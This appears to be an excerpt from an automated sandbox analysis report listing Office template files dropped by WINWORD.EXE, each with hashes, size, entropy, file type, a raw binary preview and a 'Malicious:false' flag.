                                                  SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                  Malicious:false
                                                  Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4243
                                                  Entropy (8bit):7.824383764848892
                                                  Encrypted:false
                                                  SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                  MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                  SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                  SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                  SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                  Malicious:false
                                                  Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):16806
                                                  Entropy (8bit):7.9519793977093505
                                                  Encrypted:false
                                                  SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                  MD5:950F3AB11CB67CC651082FEBE523AF63
                                                  SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                  SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                  SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):11380
                                                  Entropy (8bit):7.891971054886943
                                                  Encrypted:false
                                                  SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                  MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                  SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                  SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                  SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):6024
                                                  Entropy (8bit):7.886254023824049
                                                  Encrypted:false
                                                  SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                  MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                  SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                  SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                  SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):9191
                                                  Entropy (8bit):7.93263830735235
                                                  Encrypted:false
                                                  SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                  MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                  SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                  SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                  SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                  Malicious:false
                                                  Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4326
                                                  Entropy (8bit):7.821066198539098
                                                  Encrypted:false
                                                  SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                  MD5:D32E93F7782B21785424AE2BEA62B387
                                                  SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                  SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                  SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                  Malicious:false
                                                  Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):7370
                                                  Entropy (8bit):7.9204386289679745
                                                  Encrypted:false
                                                  SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                  MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                  SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                  SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                  SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                  Malicious:false
                                                  Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5596
                                                  Entropy (8bit):7.875182123405584
                                                  Encrypted:false
                                                  SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                  MD5:CDC1493350011DB9892100E94D5592FE
                                                  SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                  SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                  SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):3683
                                                  Entropy (8bit):7.772039166640107
                                                  Encrypted:false
                                                  SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                  MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                  SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                  SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                  SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                  Malicious:false
                                                  Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):4888
                                                  Entropy (8bit):7.8636569313247335
                                                  Encrypted:false
                                                  SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                  MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                  SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                  SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                  SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                  Malicious:false
                                                  Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):6448
                                                  Entropy (8bit):7.897260397307811
                                                  Encrypted:false
                                                  SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                  MD5:42A840DC06727E42D42C352703EC72AA
                                                  SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                  SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                  SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                  Malicious:false
                                                  Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):5630
                                                  Entropy (8bit):7.87271654296772
                                                  Encrypted:false
                                                  SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                  MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                  SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                  SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                  SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                  Malicious:false
                                                  Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):6193
                                                  Entropy (8bit):7.855499268199703
                                                  Encrypted:false
                                                  SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                  MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                  SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                  SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                  SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                  Malicious:false
                                                  Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3075
                                                  Entropy (8bit):7.716021191059687
                                                  Encrypted:false
                                                  SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                  MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                  SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                  SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                  SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                  Malicious:false
